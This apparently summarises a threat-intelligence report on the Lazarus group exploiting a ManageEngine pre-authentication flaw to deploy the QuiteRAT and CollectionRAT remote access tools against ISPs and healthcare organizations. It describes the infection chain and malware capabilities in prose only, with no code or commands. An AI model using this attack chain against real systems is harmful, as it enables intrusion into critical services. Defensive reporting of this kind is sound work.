Lazarus exploited CVE-2022-47966, a pre-authentication RCE flaw in Zoho ManageEngine products, to compromise vulnerable ServiceDesk Plus instances and deploy QuiteRAT against UK internet service providers as well as internet backbone suppliers and healthcare organizations in the US and UK. QuiteRAT is presented as a smaller successor to MagicRAT, retaining remote access capabilities such as system information collection, process execution, file management, reverse shells, payload fetching, and self-deletion while relying on C2-provided persistence. The infection chain begins with exploitation of the exposed ManageEngine server, after which the Java runtime downloads and runs the QuiteRAT binary, which beacons basic system data to C2 infrastructure and waits for command codes or Windows commands executed through child cmd.exe processes. Reused Lazarus infrastructure also led researchers to CollectionRAT, a Windows MFC-based RAT that fingerprints victims, supports reverse shell activity, file read/write, process spawning, additional payload execution, and self-deletion. The excerpt includes hashes, IPs, and URLs tied to the activity, and notes supporting tradecraft such as DeimosC2, Plink, and Mimikatz.